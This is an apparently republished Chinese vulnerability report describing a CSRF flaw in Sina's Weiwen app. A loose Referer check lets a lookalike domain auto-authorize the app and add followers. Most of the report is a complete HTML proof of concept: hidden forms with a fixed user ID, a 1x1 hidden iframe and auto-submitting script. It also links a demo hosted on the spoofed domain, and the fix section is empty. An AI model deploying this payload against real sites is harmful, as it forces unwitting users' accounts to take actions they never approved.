新浪对某些应用带有自动授权行为。第三方应用不严谨导致 漏洞 存在(这个应用貌似也是新浪官方的)。主要是Referer判断不严谨。可以导致http://weiwen.weibo.com.zile.me 这种域名欺诈。
如果微问应用没有授权,使用强制加载页面则可自动授权。如果以前用过直接构造From Post即可。虽然加了不能iframe加载,也可以绕过的。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>CSRF Test</title> </head> <body> <form action="http://weiwen.wenwo.com/user/cat" method="post" name="f1" target="uu"> <input type="hidden" name="duserId" value="4ff98271073a0f7ce770b817" /> <input type="hidden" name="source" value="WEIWEN" /> </form> <form action="http://weiwen.weibo.com/" method="post" name="ccc" target="_blank" > </form> <iframe name="uu" src="http://weiwen.wenwo.com" width="1" height="1" frameborder="0"></iframe> <script language="javascript"> ccc.submit(); window.setTimeout(function(){ f1.submit(); },5000); </script> </body> </html>
Demo:http://weiwen.weibo.com.zile.me/
修复方案:
你们懂的。
查看更多关于新浪Referer判断不严谨可CSRF加粉 - 网站安全 - 自学的详细内容...